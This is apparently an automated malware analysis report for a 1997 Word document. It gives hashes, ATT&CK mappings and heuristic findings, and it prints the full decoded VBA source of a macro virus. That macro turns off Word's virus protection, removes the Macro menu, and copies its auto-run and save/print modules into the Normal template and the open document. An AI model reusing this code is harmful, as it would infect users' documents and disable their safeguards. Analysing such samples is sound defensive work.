Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12ae04c97431e16a…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1997-01-29 21:48:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: f0b7981d32dce592591213f420b99189
SHA-1: 1b65c2da84ba99d6e45c09ab25d9b55278b4b116
SHA-256: 12ae04c97431e16a54d62780b5902b3a5437418753e3a5ab3357546053d76a0f
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that use the AutoOpen and AutoClose triggers, indicating an attempt to execute code when the document is opened and closed. The script copies VBA components to the Normal template and the active document, which is a common technique for establishing persistence. The specific macros copied (AutoOpen, AutoClose, ArchivoGuardar, etc.) suggest a focus on controlling document saving and printing actions, potentially to evade detection or ensure continued execution.

Heuristics 4

  • VBA macros detected (severity: medium; 2 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1760 bytes
SHA-256: 630661b82b6778db7d939edac8cd63f0a46e5207403e08a2c540cca47573e688
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Sub MAIN()

On Error Resume Next



Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer




n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next



Documents.Save NoPrompt:=True, OriginalFormat:=wdWordDocument




End Sub


Attribute VB_Name = "ArchivoGuardar"

Attribute VB_Name = "ArchivoGuardarComo"




Attribute VB_Name = "ArchivoImprimir"


Attribute VB_Name = "ArchivoImprimirPredeter"